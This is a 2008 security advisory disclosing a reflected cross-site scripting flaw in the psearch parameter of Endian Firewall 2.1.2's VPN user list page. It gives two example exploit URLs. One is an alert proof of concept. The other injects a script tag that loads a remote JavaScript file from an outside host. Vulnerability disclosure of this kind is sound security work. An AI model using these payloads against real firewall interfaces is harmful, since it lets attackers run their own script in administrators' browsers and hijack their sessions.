#Security Advisory - Multiple Vulnerabilities in Endian firewall# 

Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.

Date            : 01-28-2008
Product         : Endian Firewall
Version         : 2.1.2 - Prior version maybe also be affected
Vendor          : http://www.endian.com/en/
Author          : syniack
Contact         : syniack@gmail.com
S.Page          : http://bsecure.net.pk

XSS Vulnerability: [TESTED]

Security issue in the following file:

vpnum/userslist.php?psearch=xss

Example:

http://www.example.com/vpnum/userslist.php?psearch="><scriptsrc=http://www.example2.com/re.js></script>

http://www.example.com/vpnum/userslist.php?psearch="><script>alert(1);</script>